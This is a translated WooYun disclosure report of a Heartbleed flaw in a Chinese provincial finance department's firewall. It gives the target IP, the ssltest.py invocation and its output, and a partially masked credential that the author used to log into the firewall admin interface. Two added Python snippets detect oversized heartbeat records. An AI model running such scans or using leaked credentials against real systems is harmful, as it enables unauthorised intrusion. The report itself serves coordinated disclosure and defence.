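Vulnerability summary

Bug ID: wooyun-2014-082885

Title: OpenSSL vulnerability in the firewall of a government agency in Shandong

Related vendor: CNCERT (National Internet Emergency Center)

Author: 火焰真菌

Submitted: 2014-11-11 18:32

Fixed: 2014-12-26 18:34

Published: 2014-12-26 18:34

Vulnerability type: System/service patches not applied in time

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org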


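Vulnerability details

Disclosure status:

2014-11-11: Details reported to the vendor; awaiting vendor handling
2014-11-14: Vendor confirmed; details disclosed only to the vendor
2014-11-24: Details disclosed to core white hats and experts in related fields
2014-12-04: Details disclosed to regular white hats
2014-12-14: Details disclosed to intern white hats
2014-12-26: Details disclosed to the public

Brief description:

OpenSSL vulnerability in the firewall of a government agency in Shandong

Detailed description:

A firewall at the Shandong Department of Finance: https://60.216.5.94/

[Screenshot: Topsec (天融信) login page]


Testing shows that the OpenSSL vulnerability is present.
Test procedure: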

:\Python27>python.exe ssltest.py 60.216.5.94 -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1244
... received message: type = 22, ver = 0302, length = 397
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:


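Login password obtained: ********@xxzx.gov.cn (part of the password is replaced with *).
Interface after logging in:

[Screenshot: Topsec (天融信) firewall]


I only looked at the information.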
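
The record sequence in the test log (four type 22 handshake records, then a type 24 heartbeat record of length 16384 with no type 20 ChangeCipherSpec in between) can be flagged passively from TLS record headers alone. The following detector is an added example, not part of the original report or of ssltest.py; the direction labels, the `margin` tolerance, and every record length not printed in the log are constructed assumptions.

```python
import struct
from dataclasses import dataclass

CHANGE_CIPHER_SPEC, HANDSHAKE, HEARTBEAT = 20, 22, 24


@dataclass
class Record:
    direction: str  # "c2s" (client to server) or "s2c" (server to client)
    ctype: int      # TLS ContentType
    version: int    # e.g. 0x0302 = TLS 1.1
    length: int     # record body length from the 5-byte header

    def describe(self):
        # Same fields the test log prints for each received record.
        return "type = %d, ver = %04x, length = %d" % (
            self.ctype, self.version, self.length)


def parse_records(direction, buf):
    """Return (complete records, bytes consumed) for one direction's buffer."""
    records, off = [], 0
    while off + 5 <= len(buf):
        ctype, version, length = struct.unpack_from(">BHH", buf, off)
        if off + 5 + length > len(buf):
            break  # body not fully captured yet; wait for more data
        records.append(Record(direction, ctype, version, length))
        off += 5 + length
    return records, off


def analyze(segments, margin=64):
    """segments: (direction, bytes) in capture order. Returns (rule, Record) pairs.

    Only record headers are inspected, so the rules also apply to encrypted
    heartbeats. margin is an assumed tolerance for padding differences
    between a heartbeat request and its response; tune it for your traffic.
    """
    buffers = {"c2s": b"", "s2c": b""}
    ccs_seen = False          # simplification: one flag for the whole flow
    last_request_len = None   # assumes c2s heartbeats are the requests
    findings = []
    for direction, data in segments:
        buffers[direction] += data
        records, used = parse_records(direction, buffers[direction])
        buffers[direction] = buffers[direction][used:]
        for rec in records:
            if rec.ctype == CHANGE_CIPHER_SPEC:
                ccs_seen = True
            if rec.ctype != HEARTBEAT:
                continue
            # RFC 6520: heartbeat requests should not be sent during handshakes.
            if not ccs_seen:
                findings.append(("heartbeat-during-handshake", rec))
            if direction == "c2s":
                last_request_len = rec.length
            elif (last_request_len is not None
                  and rec.length > last_request_len + margin):
                findings.append(("oversized-heartbeat-response", rec))
    return findings


def make_record(ctype, length, version=0x0302):
    """Constructed test record: real 5-byte header, zero-filled body."""
    return struct.pack(">BHH", ctype, version, length) + bytes(length)


def flow_like_report():
    """Constructed flow mirroring the header values printed in the test log."""
    big = make_record(HEARTBEAT, 16384)
    return [
        ("c2s", make_record(HANDSHAKE, 220)),  # Client Hello, length constructed
        ("s2c", b"".join(make_record(HANDSHAKE, n) for n in (58, 1244, 397, 4))),
        ("c2s", make_record(HEARTBEAT, 3)),    # request size is constructed
        ("s2c", big[:1000]),                   # response split across two reads
        ("s2c", big[1000:]),
    ]


def benign_flow():
    """Constructed flow: full handshake, then same-sized heartbeats."""
    return [
        ("c2s", make_record(HANDSHAKE, 220)),
        ("s2c", b"".join(make_record(HANDSHAKE, n) for n in (58, 1244, 397, 4))),
        ("c2s", make_record(HANDSHAKE, 262) + make_record(CHANGE_CIPHER_SPEC, 1)
                + make_record(HANDSHAKE, 48)),
        ("s2c", make_record(CHANGE_CIPHER_SPEC, 1) + make_record(HANDSHAKE, 48)),
        ("c2s", make_record(HEARTBEAT, 80)),
        ("s2c", make_record(HEARTBEAT, 80)),
    ]


if __name__ == "__main__":
    for rule, rec in analyze(flow_like_report()):
        print(rule, rec.direction, rec.describe())
```
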

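Proof of vulnerability:

A firewall at the Shandong Department of Finance: https://60.216.5.94/

[Screenshot: Topsec (天融信) login page]


Testing shows that the OpenSSL vulnerability is present.
Test procedure: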

:\Python27>python.exe ssltest.py 60.216.5.94 -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1244
... received message: type = 22, ver = 0302, length = 397
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................


Login password obtained: ********@xxzx.gov.cn (part of the password has been replaced with *).
Interface after logging in:

[Image: 天融信墙.JPG (Topsec firewall)]


I only looked at the information.

Remediation:

1: Fix the OpenSSL vulnerability
2: Apply ACL restrictions to the firewall management address
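
One way to confirm the fix and to monitor for the same condition is to compare heartbeat record sizes in captured traffic: the test output in this report shows a heartbeat record (type = 24) of length 16384 returned by the server. The following is an added example, not part of the original report; the function names, the 3-byte client record, the 19-byte normal response and the `slack` threshold are assumptions made for illustration.

```python
import struct

HEARTBEAT = 24   # TLS record content type for heartbeat messages
HANDSHAKE = 22   # TLS record content type for handshake messages

def record(ctype: int, version: int, body: bytes) -> bytes:
    """Build one TLS record: 1-byte type, 2-byte version, 2-byte length, body."""
    return struct.pack(">BHH", ctype, version, len(body)) + body

def parse_records(stream: bytes):
    """Split one direction of a captured TLS stream into (type, version, length)."""
    records, off = [], 0
    while off + 5 <= len(stream):
        ctype, version, length = struct.unpack_from(">BHH", stream, off)
        if off + 5 + length > len(stream):
            break  # truncated capture: stop rather than guess at a partial record
        records.append((ctype, version, length))
        off += 5 + length
    return records

def oversized_heartbeat_responses(client_stream: bytes, server_stream: bytes,
                                  slack: int = 64):
    """Return (version, length) of server heartbeat records that are larger than
    the largest client heartbeat record plus `slack` bytes.

    `slack` (an assumed value) leaves room for the response's own padding and,
    on an encrypted connection, for the MAC and cipher padding.
    """
    requests = [n for t, _, n in parse_records(client_stream) if t == HEARTBEAT]
    limit = max(requests, default=0) + slack
    return [(v, n) for t, v, n in parse_records(server_stream)
            if t == HEARTBEAT and n > limit]

# Constructed sample traffic: only the record headers matter to the detector,
# so every record body is zero-filled. The server-side types, version and
# lengths mirror the report's test output (type = 22 length = 4, then
# type = 24 length = 16384); the client record and normal response are assumed.
CLIENT = record(HEARTBEAT, 0x0302, bytes(3))
SERVER_LEAKY = record(HANDSHAKE, 0x0302, bytes(4)) + record(HEARTBEAT, 0x0302, bytes(16384))
SERVER_NORMAL = record(HANDSHAKE, 0x0302, bytes(4)) + record(HEARTBEAT, 0x0302, bytes(19))

if __name__ == "__main__":
    for name, server in (("leaky", SERVER_LEAKY), ("normal", SERVER_NORMAL)):
        hits = oversized_heartbeat_responses(CLIENT, server)
        print(name, [(hex(v), n) for v, n in hits])
```

The check uses only record-layer headers, so it also works on encrypted sessions where the heartbeat payload itself cannot be read.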

Copyright notice: when reposting, please credit the source 火焰真菌@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmation time: 2014-11-14 17:48

Vendor reply:

Latest status:

None yet